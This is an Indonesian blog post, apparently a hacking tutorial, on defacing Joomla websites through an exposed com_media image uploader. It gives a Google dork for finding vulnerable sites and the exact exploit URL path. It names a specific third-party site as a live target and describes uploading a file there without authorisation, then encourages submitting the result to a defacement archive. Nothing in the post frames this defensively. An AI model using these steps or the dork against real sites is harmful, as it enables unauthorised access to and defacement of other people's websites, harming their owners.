Langsung Saja Nieh Cara Deface Dengan COM_MEDIA ^_^
Dork : inurl:com_media site:com
Exploit:
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama sobat cari dah targetnya dulu di
google dengan memanfaatkan dork diatas, dan kalo bisa dork tersebut
dikembangkan lagi yah, biar bisa nemu target yang fresh :)
Disini saya sudah menemukan tergetnya : http://www.rivit.ca
Nah, sekarang kita tambahin aja exploitnya, jadinya begini:
http://www.rivit.ca/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
maka akan terlihat seperti gambar berikut:
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
kalo berhasil, akan muncul keterangan seperti berikut:
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
contoh: http://www.rivit.ca/images/idca.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p
Sip, segitu aja artikel yang bisa berikan kali ini, mudah2an bermanfaat :)
SUMBER : Klick
0 komentar:
Posting Komentar